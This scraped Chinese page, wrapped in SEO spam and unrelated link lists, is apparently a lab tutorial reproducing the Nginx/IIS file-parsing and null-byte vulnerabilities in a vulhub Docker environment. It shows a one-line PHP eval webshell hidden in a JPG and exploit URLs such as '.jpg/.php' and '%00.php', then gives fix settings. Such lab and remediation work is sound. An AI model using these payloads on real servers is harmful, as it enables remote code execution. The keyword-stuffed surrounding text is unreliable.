当前位置: 首页 > news >正文

提供网站建设的功能温州百度推广公司电话

提供网站建设的功能,温州百度推广公司电话,佛山学校网站建设,网站上传小马后怎么做一、漏洞说明 Nginx文件解析漏洞算是一个比较经典的漏洞&#xff0c;接下来我们就通过如下步骤进行漏洞复现&#xff0c;以及进行漏洞的修复。 版本条件&#xff1a;IIS 7.0/IIS 7.5/ Nginx <8.03 二、搭建环境 cd /vulhub/nginx/nginx_parsing_vulnerability docker-compos…

一、漏洞说明
Nginx文件解析漏洞算是一个比较经典的漏洞,接下来我们就通过如下步骤进行漏洞复现,以及进行漏洞的修复。
版本条件:IIS 7.0/IIS 7.5/ Nginx <8.03
二、搭建环境
cd /vulhub/nginx/nginx_parsing_vulnerability
docker-compose up -d
在这里插入图片描述在这里插入图片描述

三、漏洞特征
访问:http://192.168.25.128/uploadfiles/nginx.png
在这里插入图片描述

然后我们输入/.php,可以发现并没有出现文件为找到,而是出现了php的配置信息
在这里插入图片描述

四、漏洞复现
使用界面的上传功能上传一个jpg图片马,jpg内容是@eval($_POST[“fname”]);
在这里插入图片描述

点击上传后
在这里插入图片描述

然后访问:
http://192.168.25.128/uploadfiles/b82ae21729b331095eb02a213284320d.jpg/.php
在这里插入图片描述

五、修复建议
1.php.ini配置文件中的cgi.fix_pathinfo=1设置为0
2.security.limit_extensions=./php
六、Nginx <8.03 空字节代码执行漏洞
影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
当使用PHP-FastCGI执行PHP时,遇到url里面存在%00空字节时与FastCGI的处理不一致,导致可在非PHP文件中嵌入PHP代码,通过访问url+%00.PHP来执行其中的PHP代码。
例如:"http://127.0.0.1/1.jpg%00.php"会把1.jpg文件(木马文件)当做PHP文件来执行。xxx.jpg%00.php

http://www.mmbaike.com/news/95026.html

相关文章:

  • 网站页面日本樱花免m38vcom费vps
  • 网站留言板html代码自己建网站详细流程
  • 网站视频下载到手机怎么做十大免费网站推广平台有哪些
  • 做网站找个人还是公司seo初级入门教程
  • 手机网站绑定域名是什么意思众志seo
  • 我爱建站免费空间大连中小企业网络营销
  • 电商网站开发 知乎软文代发平台
  • 做简历的软件免费泰州seo网络公司
  • 谷歌翻译做多语言网站推广产品的软文
  • 怎么做门户网站设计静态网页设计与制作
  • 家用电脑做网站服务器长沙seo网络优化
  • 网站建设模板删不掉seo课程培训视频
  • 东莞网页设计多少钱图片seo优化是什么意思
  • 免费商城网站建设平台现在做推广的新渠道有哪些
  • 数字广东网络建设有限公司电话兰州seo网站建设
  • android 移动网站开发营销是什么意思
  • 威海做网站推广的企业杭州免费网站制作
  • 做兼职调查哪个网站好日本产品和韩国产品哪个好
  • 示范校建设专题网站福建网络seo关键词优化教程
  • 企业如何做网站建站推广方案模板
  • 昆明找工作哪个网站好百度商家入驻
  • 湖南网站建设oqiandu深圳推广公司
  • 太原网页设计最新招聘信息重庆seo优化
  • 湛江找人做网站排名网站搜什么关键词好
  • 泉州公司做网站网络培训系统
  • 做网站会不会亏本seo诊断工具
  • wifi管理网站seo网站优化培训要多少钱
  • 舟山网站建设流程成都百度推广和seo优化
  • 2016网站谷歌权重企业网站seo公司
  • 苏州网站设计公司价格杭州网站建设书生商友